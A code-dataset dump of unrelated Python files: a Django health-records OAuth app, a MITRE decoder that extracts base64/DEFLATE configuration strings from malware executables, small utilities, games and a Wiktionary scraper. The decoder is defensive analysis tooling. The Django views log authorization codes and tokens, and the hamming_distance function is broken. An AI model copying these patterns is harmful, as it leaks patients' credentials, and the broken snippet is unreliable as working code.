attributeTransferNode=listConnections(arrayToPointColorNode,s=1,d=0,p=1)[1].split('.')[0]
attributeTransferInMeshSource=listConnections(attributeTransferNode,s=1,d=0,p=0)[2]
arrayDataContainerNode=listConnections(arrayToPointColorNode,s=1,d=0,p=1)[0].split('.')[0]
timeToUnitNode=listConnections(arrayDataContainerNode,s=1,d=0,p=1)[0].split('.')[0]
delete(timeToUnitNode)
outGeoNode=listConnections(attributeTransferNode+'.inGeometry',s=1,d=0,p=1)[0]
connectAttr(outGeoNode,connectMesh,force=1)
tmpBoundingObjNodes=listConnections(attributeTransferNode,s=1,d=0)
for i in range(0,len(tmpBoundingObjNodes)):
if i%2==0:
if tmpBoundingObjNodes[i].find('boudingObject')>0:
boundingObjNodes.append(tmpBoundingObjNodes[i])
delete(arrayToPointColorNode)
#if nodeType(attributeTransferInMeshSource)=='cluster':
# delete(clusterOutMesh+'Orig')
#delete(arrayDataContainerNode)
#delete(attributeTransferNode)
smoothNames=ls(selObj+'Smooth*',typ='polySmoothFace')
smoothInMeshNodes=''
if len(smoothNames)>0:
for smoothName in smoothNames:
setAttr(smoothName+'.divisions',0)
#smoothInMeshNode=listConnections(smoothNames[0],s=1,d=0,p=1)[0].split('.')[0]
#delete(smoothNames)
#delete(smoothInMeshNode)
setAttr(connectMesh.split('.')[0]+'.displayColors',0)
#去掉数组里重复的元素
for i in range(len(boundingObjNodes)-1,-1,-1):
if boundingObjNodes.count(boundingObjNodes[i])>1:
boundingObjNodes.pop(i)
if len(boundingObjNodes)>0:
for boundingObjNode in boundingObjNodes:
boundingObjShape=listRelatives(boundingObjNode,c=1)[0]
if not listConnections(boundingObjShape,s=0,d=1):
delete(boundingObjNode)
checkNodeGrp='checkNode_grp'
if objExists(checkNodeGrp):
if listRelatives(checkNodeGrp,c=1)==None:
delete(checkNodeGrp)
def removeSmooth_ClusterCmd():
selObjs=ls(sl=1,l=1)
for selObj in selObjs:
selObjName=selObj.split('|')[len(selObj.split('|'))-1]
smoothNames=ls(selObjName+'Smooth*',typ='polySmoothFace')
clusterNames=ls(selObjName+'cluster*',typ='cluster')
if len(smoothNames)>0:
smoothInMeshNode=listConnections(smoothNames[0],s=1,d=0,p=1)[0].split('.')[0]
delete(smoothNames)
if nodeType(smoothInMeshNode)=='mesh':
delete(smoothInMeshNode)
if len(clusterNames)>0:
for clusterName in clusterNames:
clusterOutMesh=listConnections(clusterName+'.outputGeometry[0]',s=1,p=1)[0].split('.')[0]
delete(clusterOutMesh+'Orig')
delete(clusterNames)
def setBoundingObjRadiusCmd():
selBoundingObjs=ls(sl=1)
radiusVal=floatSliderGrp('boundingObjectRadiusTex',q=1,v=1)
for boundingObjNode in selBoundingObjs:
boundingObjShape=listRelatives(boundingObjNode,c=1)[0]
setAttr(boundingObjShape+'.pointRadius',radiusVal)
|
999,348 | 60e79cc9c8ae7d2d320e0372de31e3a1a683bd08 | import json
import os
import traceback
import requests
import re
import ast
import logging
from lxml import etree
from django.conf import settings
from django.shortcuts import render, redirect
from django.http import HttpResponse, HttpResponseRedirect, HttpResponseBadRequest
from django.utils import timezone
from rhythm.private import EPIC_TEST_ID, EPIC_CLIENT_ID, EPIC_REDIRECT_URL
from Pisces.decorators import authentication_required
from Pisces import endpoints, observations
logger = logging.getLogger(__name__)
def exchange_token(provider, authorization_code, redirect_url):
token_endpoint = endpoints.get_endpoint(provider, "token")
client_id = EPIC_CLIENT_ID if provider != "Demo" else EPIC_TEST_ID
data = {
"grant_type": "authorization_code",
"code": authorization_code,
"redirect_uri": redirect_url,
"client_id": client_id
}
response = requests.post(token_endpoint, data, headers=dict(Accept="application/json"))
logger.debug(response.content)
token_json = response.json()
return token_json
def get_patient_info(request):
if not request.session.get("patient"):
patient_id = request.session.get("patient_id")
api = endpoints.initialize_api(request)
try:
response = api.get("Patient/%s" % patient_id)
except Exception as ex:
request.session["errors"] = "%s: %s" % (type(ex), str(ex))
return None
if response.status_code != 200:
msg = "Failed to get patient data.\n Response Code: %s.\n %s" % (
response.status_code,
response.content
)
logger.debug(msg)
request.session["errors"] = msg
return None
request.session["patient"] = response.json()
return request.session.get("patient")
def logout(request):
request.session.flush()
return redirect("pisces:home")
def index(request):
authorization_code = request.GET.get("code")
provider = request.session.get("provider")
if "localhost" in request.get_host():
redirect_uri = "http://" + request.get_host() + "/pisces"
else:
redirect_uri = EPIC_REDIRECT_URL
logger.debug("Provider: %s, Authorization Code: %s" % (provider, authorization_code))
if authorization_code and provider:
logger.debug("Provider: %s, Authorization Code: %s" % (provider, authorization_code))
token_json = exchange_token(provider, authorization_code, redirect_uri)
logger.debug(token_json)
return initialize_session(request, token_json.get("access_token"), token_json.get("patient"))
access_token = request.GET.get("access_token")
patient_id = request.GET.get("patient_id")
if access_token and patient_id and provider:
logger.debug("Access code and patient ID found in GET request.")
return initialize_session(request, access_token, patient_id)
providers = endpoints.load_providers()
# Index page displays and clear the errors.
errors = request.session.pop("errors", None)
return render(request, "index.html", {
"title": "Pisces",
"providers": providers,
"top_providers": ["Demo"],
"errors": errors,
})
def initialize_session(request, access_token, patient_id):
request.session["access_token"] = access_token
request.session["patient_id"] = patient_id
request.session["patient"] = get_patient_info(request)
request.session["expiration"] = timezone.now() + timezone.timedelta(seconds=3500)
if request.session["access_token"] and request.session["patient_id"]:
return redirect("pisces:home")
return HttpResponse("Authentication Failed.")
def authenticate(request):
provider = request.GET.get("provider")
request.session["provider"] = provider
client_id = EPIC_CLIENT_ID if provider != "Demo" else EPIC_TEST_ID
if provider == "Demo":
logger.debug("Connecting to sandbox...")
request.session["access_token"] = "X"
request.session["patient_id"] = "Tbt3KuCY0B5PSrJvCu2j-PlK.aiHsu2xUjUM8bWpetXoB"
request.session["patient"] = get_patient_info(request)
request.session["expiration"] = timezone.now() + timezone.timedelta(seconds=3500)
return redirect("pisces:home")
if "localhost" in request.get_host():
redirect_uri = "http://" + request.get_host() + "/pisces"
else:
redirect_uri = EPIC_REDIRECT_URL
try:
authenticate_url = endpoints.get_authentication_url(
client_id=client_id,
provider=provider,
redirect_uri=redirect_uri
)
except NotImplementedError as ex:
return HttpResponse(ex.args)
logger.debug("Redirect URL: %s" % authenticate_url)
return HttpResponseRedirect(authenticate_url)
@authentication_required
def home(request):
patient = get_patient_info(request)
resources = [
{
"name": "Laboratory Results",
"link": "observations/Laboratory"
}
]
return render(request, "home.html", {
"title": "Your Data",
"patient": patient,
"resources": resources,
})
@authentication_required
def view_observations(request, category):
observation_class = getattr(observations, category)
if not observation_class:
return HttpResponseBadRequest("%s is not supported." % category)
patient_id = request.session.get("patient_id")
api = endpoints.initialize_api(request)
response = api.get("Observation", patient=patient_id, category=category)
entries = None
try:
data = response.json()
entries = data.get("entry")
except:
traceback.print_exc()
if not entries:
return HttpResponse("Failed to obtain %s data." % category)
groups = observation_class(entries).group_by_code()
return render(request, "observations.html", {
"title": "Observations",
"data": data,
"groups": groups,
"total": len(groups.keys())
})
@authentication_required
def view_laboratory(request, code):
patient_id = request.session.get("patient_id")
api = endpoints.initialize_api(request)
response = api.get("Observation", patient=patient_id, category="Laboratory")
entries = None
try:
data = response.json()
entries = data.get("entry")
except:
pass
if not entries:
return HttpResponse("Failed to obtain Laboratory data.")
groups = observations.Laboratory(entries).group_by_code()
resources = groups.get(code)
if resources:
title = resources[0].get("code", dict()).get("text")
else:
title = "N/A"
return render(request, "results.html", {
"title": title,
"data": data,
"resources": resources,
})
|
999,349 | b260d6cf43cecb4eedbba5068d2d6e42c46825f3 | import os
from src.constants import INPUT_DIR_PATH
def split_file(input_file_path, result_dir_path, n):
file_name = os.path.splitext(input_file_path)[0]
new_files = [
os.path.join(result_dir_path, '{}_{}.txt'.format(file_name, i))
for i in range(1, n+1)
]
chunk_size = os.path.getsize(input_file_path) // n
with open(input_file_path, 'r') as f:
for _file in new_files:
data = f.read(chunk_size)
nf = open(_file, 'w')
nf.write(data)
nf.close()
def get_split_file_path_by_name(name):
return os.path.join(INPUT_DIR_PATH, name)
# split_file(
# '/Users/rickskyy/projects/distributed_systems_course/resources/bible.txt',
# '/Users/rickskyy/projects/distributed_systems_course/resources',
# 15
# )
|
999,350 | a15e3c6fb19f5fa92439a829a824c9f55e4937c3 | n = 4
k = 3
visited = [False]*n
a = []
b = [0]*n
def chinhhop(i):
global a, c
if k <= n:
for v in range(0,n):
# a.append(v)
if (visited[v] == False):
b[i] = v + 1
visited[v] = True
if i == k:
c = []
for j in range(0, k):
c += [b[j]]
if(c not in a):
a += [c]
else:
chinhhop(i+1)
visited[v] = False
else:
return False
chinhhop(0)
print(*a)
|
999,351 | c46e486e0ca8fa0db3a8827d2db1e91b6776986a | """Author: Manuel Reinbold, Maximilian Renk
Date: 21/11/17
Version: 1.0
"""
import glob
from xml.dom import minidom
# Delivers the unpreprocessed raw data for all social media comments.
def get_raw_data():
data_path_positive = '../data/movieReviews/negativeFiles.txt'
data_path_negative = '../data/movieReviews/positiveFiles.txt'
positive_texts = get_data_from_txt(data_path_positive)
negative_texts = get_data_from_txt(data_path_negative)
sorted_texts = positive_texts + negative_texts
return sorted_texts, positive_texts, negative_texts
# Reads data from a xml file and return text and sentiment of social media comment.
def get_data_from_txt(filepath):
texts = []
with open(filepath, 'r', encoding='UTF-8') as file:
for line in file:
texts.append(line.strip('\n'))
return texts
def convert_to_one_file():
pos_path = '../data/movieReviews/positiveReviews/*.txt'
neg_path = '../data/movieReviews/negativeReviews/*.txt'
pos_files = glob.glob(pos_path)
neg_files = glob.glob(neg_path)
for name in pos_files:
with open('../data/movieReviews/positiveFiles.txt', 'a', encoding='utf-8') as writer:
with open(name, 'r', encoding='utf-8') as reader:
writer.write(reader.readline()+'\n')
for name in neg_files:
with open('../data/movieReviews/negativeFiles.txt', 'a', encoding='utf-8') as writer:
with open(name, 'r', encoding='utf-8') as reader:
writer.write(reader.readline()+'\n')
def main():
print("Please execute some code")
if __name__ == "__main__":
main() |
999,352 | 198bd2a9f460389f136602798a7674730e69759c | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright(c) 2021 The MITRE Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
#
# You may obtain a copy of the License at:
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import pefile
import logging
import re
import base64
import zlib
__version__ = "1.0.0"
__author__ = "Jason Batchelor"
log = logging.getLogger(__name__)
class GetConfig:
def __init__(self, buff):
"""
Initialize decoder instance.
:param bytes buff: The stream of bytes to be processed.
"""
self.buff = buff
self.elements = []
try:
pe = pefile.PE(data=self.buff)
self.decode_config(pe)
except pefile.PEFormatError:
log.debug('Supplied file must be a valid PE!')
def decode_config(self, pe):
unicode_candidates = self.find_unicode()
elements = self.find_decode_suspect_data(unicode_candidates)
self.elements = elements
def find_unicode(self, modifier=4):
"""
Find unicode characters within supplied data.
"""
wide = []
matches = re.finditer(b'([\x20-\x7e]\x00){' +
str(modifier).encode('ascii') + b',}', self.buff)
if matches:
for m in matches:
wide.append(m.group(0).decode('utf-16'))
return wide
def find_decode_suspect_data(self, candidates):
"""
From a list of candidate strings, try to decode using b64 + DEFLATE.
"""
elements = []
# Reference: Seems to reliably detect with minimal FPs
# https://github.com/ctxis/CAPE/blob/master/lib/cuckoo/common/office/olevba.py#L444
b64_rex = re.compile(
r'(?:[A-Za-z0-9+/]{4}){1,}(?:[A-Za-z0-9+/]{2}'
r'[AEIMQUYcgkosw048]=|[A-Za-z0-9+/][AQgw]==)?'
)
for c in candidates:
if b64_rex.match(c):
try:
b64 = base64.b64decode(c, validate=True)
deflate = zlib.decompress(b64, -15)
e = deflate.decode('ascii')
log.info('Candidate found! %s' % c)
elements.append(e)
except Exception:
pass
return sorted(set(elements))
def initialize_parser():
parser = argparse.ArgumentParser(
description='Process candidate. Prints results in JSON format.')
parser.add_argument('candidates', metavar='FILE',
nargs='*', help='candidate file(s).')
parser.add_argument('-v', '--verbose', action='store_true',
default=False,
help='Output additional information when processing '
'(mostly for debugging purposes).')
return parser
def main():
import os
import json
import datetime
import hashlib
p = initialize_parser()
args = p.parse_args()
root = logging.getLogger()
logging.basicConfig()
if args.verbose:
root.setLevel(logging.DEBUG)
else:
root.setLevel(logging.WARNING)
# Iterate through list of files in bulk.
for filename in args.candidates:
log.info('Processing file %s...' % filename)
if not os.path.isfile(filename):
log.warning('Failed to find file %s' % filename)
continue
f = open(filename, 'rb')
stream = f.read()
try:
pe = pefile.PE(data=stream)
timestamp = datetime.datetime.utcfromtimestamp(
pe.FILE_HEADER.TimeDateStamp)
except pefile.PEFormatError:
log.warning('%s not a pe, skipping...' % f.name)
continue
d = GetConfig(stream)
config_dict = {
'Compile Time': '%s UTC' % timestamp,
'MD5': hashlib.md5(stream).hexdigest(),
'Decoded Elements': d.elements,
}
try:
print(json.dumps(config_dict, indent=4, sort_keys=False))
except UnicodeDecodeError:
log.warning('There was a Unicode decoding error when '
'processing %s' % os.path.basename(filename))
continue
if __name__ == '__main__':
main()
|
999,353 | bf5f7f7dcf913e643f493ff10f3ecf4ab66417b1 | # coding: utf-8
from celery import Celery
app = Celery("ihome")
app.config_from_object("ihome.tasks.config")
# 让celery自己找到任务
app.autodiscover_tasks(["ihome.tasks.sms"]) |
999,354 | 017073eed14cb7eb8f6f07ca3d3624d5b4387a0c | __author__ = 'octowl'
from collections import Counter
def word_count(phrase):
return Counter(phrase.split())
|
999,355 | ff1aa112ea3cbebb68296c75e2e02abbe421e909 | # Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import annotations
import unittest
import torch
from parameterized import parameterized
from monai.transforms import GridSplit
from tests.utils import TEST_NDARRAYS, assert_allclose
A11 = torch.randn(3, 2, 2)
A12 = torch.randn(3, 2, 2)
A21 = torch.randn(3, 2, 2)
A22 = torch.randn(3, 2, 2)
A1 = torch.cat([A11, A12], 2)
A2 = torch.cat([A21, A22], 2)
A = torch.cat([A1, A2], 1)
TEST_CASE_0 = [{"grid": (2, 2)}, A, [A11, A12, A21, A22]]
TEST_CASE_1 = [{"grid": (2, 1)}, A, [A1, A2]]
TEST_CASE_2 = [{"grid": (1, 2)}, A1, [A11, A12]]
TEST_CASE_3 = [{"grid": (1, 2)}, A2, [A21, A22]]
TEST_CASE_4 = [{"grid": (1, 1), "size": (2, 2)}, A, [A11]]
TEST_CASE_5 = [{"grid": (1, 1), "size": 4}, A, [A]]
TEST_CASE_6 = [{"grid": (2, 2), "size": 2}, A, [A11, A12, A21, A22]]
TEST_CASE_7 = [{"grid": (1, 1)}, A, [A]]
TEST_CASE_8 = [
{"grid": (2, 2), "size": 2},
torch.arange(12).reshape(1, 3, 4).to(torch.float32),
torch.Tensor([[[[0, 1], [4, 5]]], [[[2, 3], [6, 7]]], [[[4, 5], [8, 9]]], [[[6, 7], [10, 11]]]]).to(torch.float32),
]
TEST_SINGLE = []
for p in TEST_NDARRAYS:
TEST_SINGLE.append([p, *TEST_CASE_0])
TEST_SINGLE.append([p, *TEST_CASE_1])
TEST_SINGLE.append([p, *TEST_CASE_2])
TEST_SINGLE.append([p, *TEST_CASE_3])
TEST_SINGLE.append([p, *TEST_CASE_4])
TEST_SINGLE.append([p, *TEST_CASE_5])
TEST_SINGLE.append([p, *TEST_CASE_6])
TEST_SINGLE.append([p, *TEST_CASE_7])
TEST_SINGLE.append([p, *TEST_CASE_8])
TEST_CASE_MC_0 = [{"grid": (2, 2)}, [A, A], [[A11, A12, A21, A22], [A11, A12, A21, A22]]]
TEST_CASE_MC_1 = [{"grid": (2, 1)}, [A] * 5, [[A1, A2]] * 5]
TEST_CASE_MC_2 = [{"grid": (1, 2)}, [A1, A2], [[A11, A12], [A21, A22]]]
TEST_MULTIPLE = []
for p in TEST_NDARRAYS:
TEST_MULTIPLE.append([p, *TEST_CASE_MC_0])
TEST_MULTIPLE.append([p, *TEST_CASE_MC_1])
TEST_MULTIPLE.append([p, *TEST_CASE_MC_2])
class TestGridSplit(unittest.TestCase):
@parameterized.expand(TEST_SINGLE)
def test_split_patch_single_call(self, in_type, input_parameters, image, expected):
input_image = in_type(image)
splitter = GridSplit(**input_parameters)
output = splitter(input_image)
for output_patch, expected_patch in zip(output, expected):
assert_allclose(output_patch, expected_patch, type_test=False)
@parameterized.expand(TEST_MULTIPLE)
def test_split_patch_multiple_call(self, in_type, input_parameters, img_list, expected_list):
splitter = GridSplit(**input_parameters)
for image, expected in zip(img_list, expected_list):
input_image = in_type(image)
output = splitter(input_image)
for output_patch, expected_patch in zip(output, expected):
assert_allclose(output_patch, expected_patch, type_test=False)
if __name__ == "__main__":
unittest.main()
|
999,356 | 49f50760114dfb0ee12de7893f5952ef4a8d8736 | """Test HomematicIP Cloud helper functions."""
import json
from homeassistant.components.homematicip_cloud.helpers import is_error_response
async def test_is_error_response() -> None:
"""Test, if an response is a normal result or an error."""
assert not is_error_response("True")
assert not is_error_response(True)
assert not is_error_response("")
assert is_error_response(
json.loads(
'{"errorCode": "INVALID_NUMBER_PARAMETER_VALUE", "minValue": 0.0, "maxValue": 1.01}'
)
)
assert not is_error_response(json.loads('{"errorCode": ""}'))
|
999,357 | 3c0d82837c75a434ecf0cb98fa8539b282a8fcd8 | import socket
#commented was for UDP
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
port = 8888
#ip = "192.168.56.101"
s.connect(('192.168.56.101',port))
#s.bind(('',port))
#while True:
data = s.recvfrom(1024)
s.send(b'Hi, saya client.ty.')
print(data)
s.close()
|
999,358 | a51574e4f33bd80704006175214d18ae1a4568bb | from .template import Template
class Comic(Template):
def __init__(self, dedup_headings=False, la_overrides=None):
super(Comic, self).__init__(
dedup_headings=dedup_headings,
la_overrides=la_overrides
)
self.footer_break = 50.0
def cleanup(self, content):
return content.strip().replace('(cid:1)', '-')
def handle_heading(self, text):
if 15.0 < text.height < 16.0:
return 1
if 11.03 < text.height < 11.04:
return 2
return 0
def handle_indent(self, text, content):
if 113.0 < text.x0:
return (1, content[0].isupper())
return (0, False)
def handle_ignored(self, content, in_table):
if not in_table:
return content.strip() in [
u'(suite)',
u'-'
]
return False
def handle_newline(self, content, in_table):
if in_table:
return content.startswith(u'- ') \
or content.endswith(u'.') \
or content.endswith(u':')
return False
def handle_linebreaks(self, content, in_table):
return not in_table and len(content)
|
999,359 | 9e85bfd855ea6f829367711b20c2e4d2c5a94441 | def hamming_distance(a, b):
if sum([1 for _ in a]) != sum([1 for _ in b]):
raise ValueError("strand lengths not equal")
strands = []
for i in range(sum([1 for _ in a])):
strands.append((a[i], b[i]))
def filter_func(p):
if p[0] != p[1]:
return 1
return len(filter(filter_func, strands))
if __name__ == "__main__":
print(hamming_distance("aabbccdd", "aabbccdd"))
|
999,360 | c571a3371f2ffd8dee3cab19ce259c8b7ea6b118 | import tensorflow as tf
import pandas as pd
from sklearn.preprocessing import LabelEncoder
AUTOTUNE = tf.data.experimental.AUTOTUNE
class Data:
def __init__(self, filepath='./', batch_size=512, only_rating=False, buffer_size=1024):
self.batch_size = batch_size
self.buffer_size = buffer_size
self.train = pd.read_csv(filepath+'train.csv')
self.test = pd.read_csv(filepath+'test.csv')
self.only_rating = only_rating
self.feature_list = []
all = pd.concat([self.train, self.test])
for column in all.columns[:-1]:
encoder = LabelEncoder()
encoder.fit(all[column])
self.feature_list.append(len(encoder.classes_))
self.train[column] = encoder.transform(self.train[column])
self.test[column] = encoder.transform(self.test[column])
self.user_size = self.feature_list[0]
self.movie_size = self.feature_list[1]
def get_train(self):
target = self.train.pop("rating")
if self.only_rating:
return tf.data.Dataset.from_tensor_slices((self.train[["user_id", "movie_id"]].values, target.values)).batch(self.batch_size).prefetch(self.buffer_size)
else:
return tf.data.Dataset.from_tensor_slices((self.train.values, target.values)).batch(self.batch_size).prefetch(self.buffer_size)
def get_test(self):
target = self.test.pop("rating")
if self.only_rating:
return tf.data.Dataset.from_tensor_slices(
(self.test[["user_id", "movie_id"]].values, target.values)).batch(self.batch_size).prefetch(
self.buffer_size)
else:
return tf.data.Dataset.from_tensor_slices((self.test.values, target.values)).batch(
self.batch_size).prefetch(self.buffer_size)
|
999,361 | 59a90a2e7c9ab99293aef895377682dab3c18044 | import random
money = 100
#CoinFlip Game
def coin_flip(call, bet):
coin = random.randint(1, 2)
#RULES
if bet > money:
print("You dont have enough money to make that bet!")
return
elif bet <= -1:
print("Bet must be positive!")
return
#Coin lands on Heads!
elif coin == 1 and call == "Heads!":
print ("Heads! $" + str(bet))
return bet
elif coin == 1 and call == "Tails!":
print ("Heads! $" + str(bet-(bet*2)))
return -bet
#Coin lands on Tails!
elif coin == 2 and call == "Tails!":
print ("Tails! $" + str(bet))
return bet
elif coin == 2 and call == "Heads!":
print ("Tails! $" + str(bet-(bet*2)))
return -bet
#Cho_han Game
def cho_han(call, bet):
dice1 = random.randint(1, 6)
dice2 = random.randint(1, 6)
dice_roll=dice1+dice2
#RULES
if bet > money:
print("You dont have enough money to make that bet!")
return
elif bet <= -1:
print("Bet must be positive!")
return
#Dice roll
elif dice_roll % 2 == 0 and call == "Even!":
print ("Even! $" + str(bet))
return bet
elif dice_roll % 2 == 0 and call == "Odd!":
print ("Even! $" + str(bet-(bet*2)))
return -bet
elif dice_roll % 2 > 0 and call == "Odd!":
print ("Odd! $" + str(bet))
return bet
elif dice_roll % 2 > 0 and call == "Even!":
print ("Odd! $" + str(bet-(bet*2)))
return -bet
#Card_draw Game
def card_draw(bet):
card_p1 = random.randint(1, 13)
card_p2 = random.randint(1, 13)
#RULES
if bet > money:
print("You dont have enough money to make that bet!")
return
elif bet <= -1:
print("Bet must be positive!")
return
elif card_p1 > card_p2:
print ("Player 1 wins $" + str(bet))
return bet
elif card_p2 > card_p1:
print ("Player 1 lost $" + str(bet-(bet*2)))
return -bet
elif card_p1 == card_p2:
print ("Tie $" + str(0))
return 0
#Roulette Game
# Impair (Odd) und Pair (Even), 1:2
# Manque (Low, 1–18) und Passe (High, 19–35), 1:2
# Number (specific Number), 1:35
def roulette(call, bet):
number = random.randint(0, 36)
#RULES
if bet > money:
print("You dont have enough money to make that bet!")
return
elif bet <= -1:
print("Bet must be positive!")
return
elif (call == 0 or call == 36):
print ("Roulette: Specific Number must be between 1 and 35!")
return money-money
#specific number
elif number == call:
print (str(number) + ", Player wins! $" + str(bet*35))
return (bet*35)
#0, 00
elif number == 0:
print ("0, Player lost! $" + str(bet-(bet*2)))
return -bet
elif number == 36:
print ("00, Player lost! $" + str(bet-(bet*2)))
return -bet
#low/high
elif (number >= 1 and number <= 18) and call == "Low!":
print ("Low, Player wins! $" + str(bet))
return bet
elif (number >= 1 and number <= 18) and call == "High!":
print ("Low, Player lost! $" + str(bet-(bet*2)))
return -bet
elif (number >= 19 and number <= 35) and call == "Low!":
print ("High, Player lost! $" + str(bet-(bet*2)))
return -bet
elif (number >= 19 and number <= 35) and call == "High!":
print ("High, Player wins! $" + str(bet))
return bet
#odd/even
elif call == "Even!" and number % 2 == 0:
print ("Even, Player wins! $" + str(bet))
return bet
elif call == "Even!" and number % 2 != 0:
print ("Odd, Player lost! $" + str(bet-(bet*2)))
return -bet
elif call == "Odd!" and number % 2 == 0:
print ("Even, Player lost! $" + str(bet-(bet*2)))
return -bet
elif call == "Odd!" and number % 2 != 0:
print ("Odd, Player wins! $" + str(bet))
return bet
#not specific number
else:
print ("Player lost! $" + str(bet-(bet*2)))
return -bet
print("GameTestsStart")
#Call CoinFlipGame
print("CoinFlip:")
print(coin_flip("Tails!", 10))
#Call Cho-han Game
print("Cho-han:")
print(cho_han("Odd!", 10))
#Call Card_draw Game
print("Card_draw:")
print(card_draw(10))
#Call Roulette
print("Roulette:")
print(roulette(0,10))
print("GameTestsEnd")
print(" ")
#Play roulette, cho_han, coin_flip or card_draw!
#roulette(call,bet) cho_han(call,bet) coin_flip(call,bet) card_draw(bet)
#CoinFlip call needs to be either "Heads!" or "Tails!"
#Cho-han call needs to be either "Odd!" or "Even!"
#Roulette call needs to be either "Odd!", "Even!", "High!", "Low!" or a specific Number between 1 and 35!
try:
money += roulette("High!",10)
money += cho_han("Even!",10)
money += coin_flip("Heads!",10)
money += card_draw(10)
except:
print("Follow the Rules!")
print(str(money) + "$ left!")
|
999,362 | 9ee887af99bc2df5c3a372564cba546818f567ab | import re
def swap(lst, a, b):
lst[a], lst[b] = lst[b], lst[a]
def push_bit(s):
"""Given a string like '0110100', push bits towards the right.
Returns 'END' if nothing can be pushed
"""
end_pattern = re.compile(r'^0*1+$')
if end_pattern.match(s):
return "END"
else:
bit_lst = list(s)
first_one = bit_lst.index('1')
# print("first_one", first_one)
# if a pattern 10 is found, counting from the left, swap them
if bit_lst[first_one+1] == '0':
swap(bit_lst, first_one, first_one+1)
else:
# look for index of the right side of string of ones
end_of_ones = first_one + bit_lst[first_one:].index('0') - 1
swap(bit_lst, end_of_ones, end_of_ones+1)
num_ones = end_of_ones - first_one + 1
# print("{} {}".format(first_one, end_of_ones))
# push left remaining ones
# fill with zeros
bit_lst[0:end_of_ones] = '0' * end_of_ones
# fill with ones
bit_lst[0:num_ones-1] = '1' * (num_ones-1)
# print("end_of_ones", end_of_ones)
return "".join(bit_lst)
def generate_bit_lst(items, n):
result = set()
bit_str = '1' * n + '0' * (items-n)
while bit_str != "END":
result.add(bit_str)
print(bit_str)
bit_str = push_bit(bit_str)
return result
# OBSERVATION: generate_bit_lst is the set of permutations of '11100'
# Computing permutations is expensive, though
|
999,363 | 3863823fdcbae751ff687516f847cdf4f07a4d14 | a = int(input())
b = int(input())
for r in range(a, b+1):
if r % 2 == 0:
print(r, end=' ')
|
999,364 | 56e5251ab360444ad6b7ccb2fcabe523a5d3d4db | """
This program will scrap each of the word from the wiktionary page. The starting page will be "https://en.wiktionary.org/wiki/Wiktionary:All_Thesaurus_pages".
Firstly we aim at constructing the scraper with 1 table and sqlite3 database.
"""
from datetime import tzinfo, timedelta, datetime
import sqlite3
import time
import urllib.request, urllib.parse, urllib.error
from bs4 import BeautifulSoup
import ssl
import re
import os.path
import urllib.request
# Ignore SSL certificate errors
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
conn = sqlite3.connect('wikiDB.sqlite')
cur = conn.cursor()
cur.executescript('''
CREATE TABLE IF NOT EXISTS wiki_data (
cnc INTEGER,
pid INTEGER,
sid INTEGER,
url TEXT UNIQUE PRIMARY KEY,
html TEXT
);
''')
commit_var = 0
def url_crawl(url,pid):
global commit_var
unique_nurl = 0
commit_var += 1
try:
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
req = urllib.request.Request(url, headers=headers)
html = urllib.request.urlopen(req).read() # html parser
soup = BeautifulSoup(html, 'html.parser')
cur.execute('''UPDATE wiki_data SET cnc = ? WHERE url = ?''',(1,url,))
cur.execute('''UPDATE wiki_data SET html = ? WHERE url = ?''',(str(soup),url,))
print(url,pid)
test_li = re.findall(r'<li>(.+)</li>',str(soup))
#print(test_li) # it have all the list element
url_str = 'https://en.wiktionary.org'
cur.execute(''' SELECT max(sid) FROM wiki_data''')
sid_max = cur.fetchone()[0] #converts the cursor object to number
print("max sid =-------------------------------------------------------------------------- ===> ",sid_max)
if sid_max == None:
sid_max = 0
sid = sid_max + 1
for item_li in test_li:
find_first = item_li.find('href="')
cut_first = find_first+6
string_cut = item_li[cut_first:]
find_sec = string_cut.find('"')
get_url_part = string_cut[:find_sec]
#print(get_url_part)
next_url = url_str + get_url_part
#print(next_url)
cur.execute('''INSERT OR IGNORE INTO wiki_data (cnc, pid, sid, url, html)
VALUES ( ?, ?, ?, ?, ? )''', ( 0,pid,sid, next_url, "", ) )
unique_nurl += 1
sid += 1
except:
#fucked up
print("Ops something is wrong!")
print("url : ",url," BLOWN OFF !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
#set the cnc
cur.execute('''UPDATE wiki_data SET cnc = ? WHERE url = ?''',(1,url,))
#continue
cur.execute('''SELECT min(sid) FROM wiki_data WHERE cnc = ?''',(0,))
sid_ = cur.fetchone()[0] #converts the cursor object to number
print("min sid= ",sid_)
print("NEW UNIQUE URL FOUND :: ",unique_nurl)
get_next_url = cur.execute('''SELECT url FROM wiki_data WHERE sid = ?''',(sid_,)).fetchone()[0]
print("next url : ",get_next_url)
if commit_var%10==0:
print("CCCCCCCCCCCCCCCCCCCCCCCCCCOOOOOOOOOOOOOOOOOOOOOOOOOOMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMIIIIIIIIIIIIIIITTTTTTTTTTTTTTTTIIIIIIIIIIIIIIINNNNNNNNGGGGGGGGG")
conn.commit()
#print("*************************************************** sid ================",sid)
#time.sleep(3)
print("Current time : ",datetime.now().isoformat(timespec='seconds'))
print("Commit var : ",commit_var)
url_crawl(str(get_next_url),sid_-1)
if __name__ == "__main__":
cur.execute(''' SELECT max(sid) FROM wiki_data''')
sid_max = cur.fetchone()[0] #converts the cursor object to number
print("max sid = ",sid_max)
if sid_max == None:
sid_max = 0
print("none-----------")
#For the first time :)
